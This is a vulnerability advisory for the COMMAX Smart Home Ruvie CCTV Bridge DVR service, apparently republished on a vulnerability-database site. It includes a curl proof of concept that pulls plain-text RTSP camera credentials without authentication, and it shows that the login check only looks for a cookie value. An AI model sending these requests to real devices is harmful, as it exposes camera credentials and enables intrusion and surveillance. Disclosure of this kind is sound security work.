Tuesday, August 17, 2021

COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credential Disclosure

COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure

Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.

Tested on: GoAhead-Webs

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php



$ curl http://TARGET:8086/overview.asp
<TITLE> Infomation</TITLE>
<script src="./jquery.min.js"></script>
<script src="./jquery.cookie.js"></script>
<script src="./login_check.js"></script>
<li> [2021/08/15 09:56:46] Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:[email protected][email protected]:554/Streaming/Channels/2:554 <BR>

$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");

document.domain = server_domain;

var cookiesAuth = $.cookie("cookiesAuth");

if (cookiesAuth != "authok") {
parent.document.location.href = "http://" + server_domain + ":8086/home.asp";

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated